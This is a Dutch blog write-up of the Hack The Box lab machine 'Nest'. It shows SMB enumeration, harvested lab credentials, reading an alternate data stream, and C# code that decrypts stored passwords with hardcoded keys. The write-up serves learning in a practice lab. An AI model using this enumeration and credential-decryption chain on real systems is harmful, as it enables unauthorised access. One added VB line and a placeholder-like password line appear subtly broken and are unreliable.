tech365
HackTheBox WriteUp Nest

Hack The Box Writeup: Nest

Nest is een Window box die 25 januari het levenslicht zag op Hack The Box. Een leuke box waar je constant bezig bent met verkennen en iedere keer een stapje verder komt. Er is flink wat discussie over de complexiteit van deze box want volgens de maker kwalificeert hij als “Easy” maar velen vinden hem tussen “Medium” en “Hard.”.

Hack The Box Nest Infocard

Look up at the stars and not down at your feet.

-Stephen Hawking –

Scanning

Eerste stap in het verkennen van Nest is een Nmap scan. Ik kies hier voor een uitgebreide scan van alle poorten (ook de niet standaard poorten) inclusief standaard scripts en service/versie detectie.

nmap -sC -sV -p- -oA nest 10.10.10.178

Een scan van het gehele poortbereik duur altijd even. Na verloop van tijd komen de resultaten naar voren en geeft de scan aan dat poort 445/tcp en 4386/tcp open zijn. Poort 445/tcp is SMB en 4386 is voor mij een onbekende. Volgens de scan draait hier een database reporting service op.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-26 19:51 GMT
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 11.33% done; ETC: 19:56 (0:03:55 remaining)
Stats: 0:05:24 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 19:57 (0:00:21 remaining)
Nmap scan report for 10.10.10.178
Host is up (0.021s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
4386/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
| Reporting Service V1.2
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions:
| Reporting Service V1.2
| Unrecognised command
| Help:
| Reporting Service V1.2
| This service allows users to run queries against databases using the legacy HQK format
| AVAILABLE COMMANDS ---
| LIST
| SETDIR <Directory_Name>
| RUNQUERY <Query_ID>
| DEBUG <Password>
|_ HELP <Command>

Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-01-26T19:59:26
|_ start_date: 2020-01-26T19:44:36

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 507.00 seconds

Ennumeration

Met behulp van SMB client komen een aantal shares naar voren. Naast de standaard ADMIN$, C$ en IPC$ zien we een paar interessante mappen.

smbclient -L 10.10.10.178
Enter WORKGROUP\root's password: 

 Sharename Type Comment
 --------- ---- -------
 ADMIN$ Disk Remote Admin
 C$ Disk Default share
 Data Disk 
 IPC$ IPC Remote IPC
 Secure$ Disk 
 Users Disk 
SMB1 disabled -- no workgroup available

Op basis van deze lijst ga ik Data, Secure$, en Users verder bekijken om te zien of er interessante informatie te vinden is. Een initiële foothold is goed, maar een set credentials is natuurlijk beter.

De share Users bevat een aantal gebruikersmappen. Naar verwachting zijn dit gebruikers waarvan credentials te vinden zijn. Voor nu mis ik nog de rechten om in de mappen te kijken. Verder naar Data.

smbclient  \\\\10.10.10.178\\users
Enter WORKGROUP\root's password: 

Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
  .                                   D        0  Sat Jan 25 23:04:21 2020
  ..                                  D        0  Sat Jan 25 23:04:21 2020
  Administrator                       D        0  Fri Aug  9 16:08:23 2019
  C.Smith                             D        0  Sun Jan 26 07:21:44 2020
  L.Frost                             D        0  Thu Aug  8 18:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 18:02:50 2019
  TempUser                            D        0  Wed Aug  7 23:55:56 2019

\Administrator
NT_STATUS_ACCESS_DENIED listing \Administrator\*

\C.Smith
NT_STATUS_ACCESS_DENIED listing \C.Smith\*

\L.Frost
NT_STATUS_ACCESS_DENIED listing \L.Frost\*

\R.Thompson
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*

\TempUser
NT_STATUS_ACCESS_DENIED listing \TempUser\*
smb: \> 

De share Data bevat een aantal geneste mappen en bestanden. Handig is hierbij het recurse commando om een volledige listing te krijgen.

smbclient  \\\\10.10.10.178\\data
Enter WORKGROUP\root's password: 

Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
  .                                   D        0  Wed Aug  7 23:53:46 2019
  ..                                  D        0  Wed Aug  7 23:53:46 2019
  IT                                  D        0  Wed Aug  7 23:58:07 2019
  Production                          D        0  Mon Aug  5 22:53:38 2019
  Reports                             D        0  Mon Aug  5 22:53:44 2019
  Shared                              D        0  Wed Aug  7 20:07:51 2019

\IT
NT_STATUS_ACCESS_DENIED listing \IT\*

\Production
NT_STATUS_ACCESS_DENIED listing \Production\*

\Reports
NT_STATUS_ACCESS_DENIED listing \Reports\*

\Shared
  .                                   D        0  Wed Aug  7 20:07:51 2019
  ..                                  D        0  Wed Aug  7 20:07:51 2019
  Maintenance                         D        0  Wed Aug  7 20:07:32 2019
  Templates                           D        0  Wed Aug  7 20:08:07 2019

\Shared\Maintenance
  .                                   D        0  Wed Aug  7 20:07:32 2019
  ..                                  D        0  Wed Aug  7 20:07:32 2019
  Maintenance Alerts.txt              A       48  Tue Aug  6 00:01:44 2019

\Shared\Templates
  .                                   D        0  Wed Aug  7 20:08:07 2019
  ..                                  D        0  Wed Aug  7 20:08:07 2019
  HR                                  D        0  Wed Aug  7 20:08:01 2019
  Marketing                           D        0  Wed Aug  7 20:08:06 2019

\Shared\Templates\HR
  .                                   D        0  Wed Aug  7 20:08:01 2019
  ..                                  D        0  Wed Aug  7 20:08:01 2019
  Welcome Email.txt                   A      425  Wed Aug  7 23:55:36 2019

\Shared\Templates\Marketing
  .                                   D        0  Wed Aug  7 20:08:06 2019
  ..                                  D        0  Wed Aug  7 20:08:06 2019
smb: \> 

Maintenance Alerts.txt en Welcome Email.txt zien er interessant uit voor straks.

De laatste share Secure$ is wel toegankelijk maar het is niet mogelijk om hier bestanden te listen. Wellicht later met een set credentials wel.

smbclient  \\\\10.10.10.178\\secure$
Enter WORKGROUP\root's password: 

Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> 

Het bestand Maintenance Alerts.txt bevat enkel een melding dat er geen Maintenance is, hier heb ik niets aan. Als tweede bestand is Welcome Email.txt aan de beurt en hier is wel ietsinteressants te vinden.

\shared\Templates\HR\> dir
  .                                   D        0  Wed Aug  7 20:08:01 2019
  ..                                  D        0  Wed Aug  7 20:08:01 2019
  Welcome Email.txt                   A      425  Wed Aug  7 23:55:36 2019

		10485247 blocks of size 4096. 6448917 blocks available

User 1: TempUser

Na de initiele foothold heb ik nu een set credentials te pakken van TempUser. Deze gebruiker was eerder al te zien op de share Users.

We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019

Thank you
HR

Gewapend met vers ontdekte credentials is het tijd om opnieuw verbinding te maken met de share om te zien of dit met TempUser meer kan leveren.

De listing geeft een flink aantal bestanden in de map IT\Configs wat lijkt op applicatie configuratiebestanden.

smbclient -U TempUser  \\\\10.10.10.178\\data
Enter WORKGROUP\TempUser's password: 

\IT\Configs\NotepadPlusPlus
  .                                   D        0  Wed Aug  7 20:31:37 2019
  ..                                  D        0  Wed Aug  7 20:31:37 2019
  config.xml                          A     6451  Thu Aug  8 00:01:25 2019
  shortcuts.xml                       A     2108  Wed Aug  7 20:30:27 2019

\IT\Configs\RU Scanner
  .                                   D        0  Wed Aug  7 21:01:13 2019
  ..                                  D        0  Wed Aug  7 21:01:13 2019
  RU_config.xml                       A      270  Thu Aug  8 20:49:37 2019

		10485247 blocks of size 4096. 6448917 blocks available

Na het doorspitten van alle bestanden heb ik veel ruis gevonden en twee interessante bestanden. Enumeration is nu eenmaal een grondige taak en voor je het weet mis je essentiële informatie.

In de map NotepadPlusPlus vind ik het bestand Config.xml waarin een verwijzing te vinden is naar een drietal andere bestanden. Opvallend is het pad naar de share Secure$ die ik eerder al bezocht, maar geen mappen kon zien. Nu heb ik echter wel een pad waar een map Carl zou moeten staan. Is de eerder gevonden gebruikersmap C.Smith van Carl?

<History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />

Het tweede interessante bestand is RU_Config in de map RU Scanner. De inhoud van dit XML-bestand geeft een gebruikersnaam en wachtwoord weer. Een snelle check geeft aan dat dit wachtwoord niet direct bruikbaar is en mogelijk versleuteld is.

<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>

Tijd om het pad in de NotepadPlusPlus config-file eens te bekijken.

smbclient -U TempUser  \\\\10.10.10.178\\Secure$
Enter WORKGROUP\TempUser's password: 
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
  .                                   D        0  Thu Aug  8 00:08:12 2019
  ..                                  D        0  Thu Aug  8 00:08:12 2019
  Finance                             D        0  Wed Aug  7 20:40:13 2019
  HR                                  D        0  Thu Aug  8 00:08:11 2019
  IT                                  D        0  Thu Aug  8 11:59:25 2019

\Finance
NT_STATUS_ACCESS_DENIED listing \Finance\*

\HR
NT_STATUS_ACCESS_DENIED listing \HR\*

\IT
NT_STATUS_ACCESS_DENIED listing \IT\*

Het pad van het bestand zou \\HTB-NEST\Secure$\IT\Carl\Temp.txt moeten zijn. Dit heeft mij even bezig gehouden voordat ik stomweg probeerde de map in de gaan ook al staat er een ACCESS_DENIED. Wat blijkt, TempUser heeft wel rechten om de map in te gaan, alleen niet het listen van files in IT. En dit geeft wel wat interessante nieuwe content.

smb: \IT\> cd Carl
smb: \IT\Carl\> recurse
smb: \IT\Carl\> dir
  .                                   D        0  Wed Aug  7 20:42:14 2019
  ..                                  D        0  Wed Aug  7 20:42:14 2019
  Docs                                D        0  Wed Aug  7 20:44:00 2019
  Reports                             D        0  Tue Aug  6 14:45:40 2019
  VB Projects                         D        0  Tue Aug  6 15:41:55 2019

		10485247 blocks of size 4096. 6448903 blocks available
smb: \IT\Carl\> 


RU Scanner was de map waarin al eerder het versleutelde wachtwoord te vinden was. Hier lijkt een Microsoft Visual Studio Project te staan wat ik in zijn geheel download om in Visual Studio verder te onderzoeken. Naar verwachting is hier de methode voor het versleutelen te vinden wat kan zorgen voor een methode om het plain tekst wachtwoord te achterhalen.

smb: \IT\Carl\VB Projects\WIP\RU\> dir
  .                                   D        0  Fri Aug  9 16:36:45 2019
  ..                                  D        0  Fri Aug  9 16:36:45 2019
  RUScanner                           D        0  Wed Aug  7 23:05:54 2019
  RUScanner.sln                       A      871  Tue Aug  6 15:45:36 2019

		10485247 blocks of size 4096. 6448903 blocks available

Na wat knutselen met het project is al snel duidelijk dat voor mij de meest eenvoudige manier om het wachtwoord te achterhalen is om onderstaande functie aan te roepen en de output simpelweg naar het consolescherm te schrijven.

In Module1.vb voeg ik onderstaande regel toe zodat het ontsleutelde wachtwoord weggeschreven wordt.

WriteLine(CInt(Utils.DecryptString(Config.Password)))

Het totaal ziet er dan als volgt uit:

Module Module1

    Sub Main()
        Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
        Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}
        WriteLine(CInt(Utils.DecryptString(Config.Password)))
    End Sub
End Module

De functie voor het ontsleutelen zelf is terug te vinden in Utils.vbs en maakt gebruik van de versleutelde tekst, een password, salt, wachtwoord iteratie, Init Vector en keysize.

User 2: C.Smith

Het script loopt en geeft een string terug als decrypted password. Ziet er aannemelijk uit zo toch?

xRxRxPANCAK3SxRxRx
htb_nest_csmith_password

Dit wachtwoord is bruikbaar bij de gebruikersnaam C.Smith en via smbclient ga ik opnieuw verbinden naar de machine om verder te zoeken.

In de output komen een aantal interessante dingen naar voren: user.txt, Debug Mode Password.txt.

smbclient -U "C.Smith"  \\\\10.10.10.178\\Users
Enter WORKGROUP\C.Smith's password: 

Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
  .                                   D        0  Sat Jan 25 23:04:21 2020
  ..                                  D        0  Sat Jan 25 23:04:21 2020
  Administrator                       D        0  Fri Aug  9 16:08:23 2019
  C.Smith                             D        0  Sun Jan 26 07:21:44 2020
  L.Frost                             D        0  Thu Aug  8 18:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 18:02:50 2019
  TempUser                            D        0  Wed Aug  7 23:55:56 2019

\Administrator
NT_STATUS_ACCESS_DENIED listing \Administrator\*

\C.Smith
  .                                   D        0  Sun Jan 26 07:21:44 2020
  ..                                  D        0  Sun Jan 26 07:21:44 2020
  HQK Reporting                       D        0  Fri Aug  9 00:06:17 2019
  user.txt                            A       32  Fri Aug  9 00:05:24 2019

\L.Frost
NT_STATUS_ACCESS_DENIED listing \L.Frost\*

\R.Thompson
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*

\TempUser
NT_STATUS_ACCESS_DENIED listing \TempUser\*

\C.Smith\HQK Reporting
  .                                   D        0  Fri Aug  9 00:06:17 2019
  ..                                  D        0  Fri Aug  9 00:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 13:18:42 2019
  Debug Mode Password.txt             A        0  Fri Aug  9 00:08:17 2019
  HQK_Config_Backup.xml               A      249  Fri Aug  9 00:09:05 2019

\C.Smith\HQK Reporting\AD Integration Module
  .                                   D        0  Fri Aug  9 13:18:42 2019
  ..                                  D        0  Fri Aug  9 13:18:42 2019
  HqkLdap.exe                         A    17408  Thu Aug  8 00:41:16 2019
smb: \> 

De user.txt blijkt inderdaad voorzien te zijn van de user flag en hiermee is het eerste deel van deze machine in the pocket!

cat user.txt
cf71b25404be5d84fd827e05f426e987

Het bestand Debug Mode Password.txt is volgens de lijst een bestand met een grootte van 0-bytes, Na het downloaden van het bestand is hij inderdaad leeg en dat is vreemd. Het gaat hier om een machine gebaseerd op Microsoft Windows en een veel gebruikte manier van het verstoppen van informatie in een bestand is het gebruik van een Alternate Data Stream (ADS). Hiermee plaats je een ander bestand met inhoud in een objecteigenschap van het dummy bestand.

Met smbclient kun je het commando allinfo gebruiken om aanvullende informatie te tonen van een bestand. Dit moet haast wel een bestand zijn met een ADS.

smb: \C.Smith\HQReporting
allinfo "Debug Mode Password.txt
stream: [:Password:$DATA], 15 bytes

Gotcha! Er zit dus een extra file in het dummy bestand. Het echte bestand wat ik moet hebben heet dus Password. Dit bestand download ik op dezelfde manier zoals de streaam aangeduid is, dus dummybestand:echtebestand.

get "Debug Mode password.txt:Password"

Nu is het bestand 15 bytes in plaats van 0 bytes. In het bestand is opnieuw een wachtwoord te vinden.

WBQ201953D8w

Omdat er veel bestanden hints geven richting reporting is het tijd om de tweede poort eens te bezoeken van Nest. Poort 4386 gaf tijdens de scan al diverse commando’s terug en basale informatie dus ik probeer door middel van telnet verbinding te maken naar Nest op poort 4386.

Eenmaal verbinding met de service geef ik het commando help en zie als snel de volgende stap, er is een DEBUG functie die een wachtwoord vereist.

telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>

Het activeren van de debug mode op basis van het eerder gevonden password in de ADS is succesvol en nu is het mogelijk om extra commando’s uit te voeren.

>debug WBQ201953D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available

>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>

Het commando list geeft terug dat ik in de ALL QUERIES map zit. Hier is niets te beleven verder.

>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  COMPARISONS
[1]   Invoices (Ordered By Customer)
[2]   Products Sold (Ordered By Customer)
[3]   Products Sold In Last 30 Days

Na wat rommelen met de commando’s kom ik erachter dat je met setdir .. een map terug gaat. List zorgt er vervolgens weer voor dat de inhoud van de map weergegeven wordt. De inhoud van deze map is niet bruikbaar op de map LDAP na.

>setdir ..

Current directory set to HQK
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml

Current Directory: HQK

In de map LDAP vind ik een executable die ik eerder tegenkwam in de map van Carl en een config file.

>setdir LDAP

Current directory set to LDAP
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP

Door middel van showquery <id> kan in de inhoud opvragen van het bestand Ldap.conf en vind ik de username: Administrator en zijn wachtwoord. Dit ziet er net als eerder versleuteld uit en een snelle controle bevestigd dit. Het wachtwoord is in deze vorm niet bruikbaar om direct mee in te loggen.

>showquery 2

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

Ik heb de Windows executable in de map van Carl eerder al opgeslagen en waarschijnlijk is dit het bestand dat zorgt voor het aanmaken of inlezen van Ldap.conf en dus ook de versleuteling.

\C.Smith\HQK Reporting\AD Integration Module
  .                                   D        0  Fri Aug  9 13:18:42 2019
  ..                                  D        0  Fri Aug  9 13:18:42 2019
  HqkLdap.exe                         A    17408  Thu Aug  8 00:41:16 2019

Gezien het feit dat het een executable is werd het even Googlen naar een gratis tool die inzicht kan geven in het gecompileerde bestand. Ik heb hiervoor dotPeek van JetBrains gebruikt. Na het open kwam ik al snel overeenkomsten tegen van het eerdere Visual Basic Project en had ik als snel de decryptie functie gevonden.

Het bestand zelf kon ik niet aanpassen om dezelfde truc uit te halen als bij het Visual Studio Project. Ik heb de relevant code gekopieerd naar een online .Net compiler om zo de functie te hebben en hier iets aan toe te voegen voor het verwerken van het versleutelde wachtwoord en de uitkomst te tonen.

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

namespace HqkLdap
{
  public class CR
  {
    private const string K = "667912";
    private const string I = "1L1SA61493DRV53Z";
    private const string SA = "1313Rf99";

    public static string DS(string EncryptedString)
    {
      return string.IsNullOrEmpty(EncryptedString) ? string.Empty : CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256);
    }
    private static string RD(
      string cipherText,
      string passPhrase,
      string saltValue,
      int passwordIterations,
      string initVector,
      int keySize)
    {
      byte[] bytes1 = Encoding.ASCII.GetBytes(initVector);
      byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue);
      byte[] buffer = Convert.FromBase64String(cipherText);
      byte[] bytes3 = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations).GetBytes(checked ((int) Math.Round(unchecked ((double) keySize / 8.0))));
      AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider();
      cryptoServiceProvider.Mode = CipherMode.CBC;
      ICryptoTransform decryptor = cryptoServiceProvider.CreateDecryptor(bytes3, bytes1);
      MemoryStream memoryStream = new MemoryStream(buffer);
      CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, decryptor, CryptoStreamMode.Read);
      byte[] numArray = new byte[checked (buffer.Length + 1)];
      int count = cryptoStream.Read(numArray, 0, numArray.Length);
      memoryStream.Close();
      cryptoStream.Close();
      return Encoding.ASCII.GetString(numArray, 0, count);
    }

   public static void Main()
 {

  Console.WriteLine(CR.DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="));
 }
}
}

De laatste regel, hieronder los weergegeven, is het enige dat nodig is om de string te decrypten en het originele password te tonen.

Console.WriteLine(CR.DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="));

Thanks for playing, een wachtwoord met een vriendelijk noot van de bedenker. Naar verwachting is dit het wachtwoord van Administrator, gezien de informatie in de Ldap.conf.

XtH4nkS4Pl4y1nGX

Root User

Met het nieuw bemachtigde wachtwoord verbind ik met behulp van smbclient naar de Users share en ga naar de map van Administrator. Er staat een bestand maar aan de naam kun je al afleiden dat dit niet de definitieve flag is voor root.

smbclient -U "Administrator"  \\\\10.10.10.178\\Users
Enter WORKGROUP\Administrator's password: 

Try "help" to get a list of possible commands.

smb: \> cd Administrator
smb: \Administrator\> dir
  .                                   D        0  Fri Aug  9 16:08:23 2019
  ..                                  D        0  Fri Aug  9 16:08:23 2019
  flag.txt - Shortcut.lnk             A     2384  Fri Aug  9 16:10:15 2019

De snelkoppeling verwijst naar de map Desktop van Administrator waar vermoedelijk de root.txt staat.

\\Htb-nest\c$\Users\Administrator\Desktop\flag.txt

Een nieuwe connectie naar de share C$ en door naar de Desktop van Administrator voor de root flag. Jep, met 32 bytes bevat root.txt de root flag!

smbclient -U "Administrator"  \\\\10.10.10.178\\C$
Enter WORKGROUP\Administrator's password: 
Try "help" to get a list of possible commands.

smb: \> cd Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> dir
  .                                  DR        0  Sun Jan 26 07:20:50 2020
  ..                                 DR        0  Sun Jan 26 07:20:50 2020
  desktop.ini                       AHS      282  Sat Jan 25 22:02:44 2020
  root.txt                            A       32  Mon Aug  5 23:27:26 2019

		10485247 blocks of size 4096. 6449467 blocks available

Martijn

Martijn is naast eigenaar van tech365 ook werkzaam als IT Professional. Zijn passies zijn gadgets, fotografie en alles wat met automotive te maken heeft. Je kunt hem ook vinden als blogger op wielerblog www.lifebehindbars.nl

Reageren

Geef een reactie

Deze website gebruikt Akismet om spam te verminderen. Bekijk hoe je reactie-gegevens worden verwerkt.

Privacy opties

Wijzig je voorkeur voor het bijhouden van gegevens op tech365.

Privacybeleid | Sluiten
Instellingen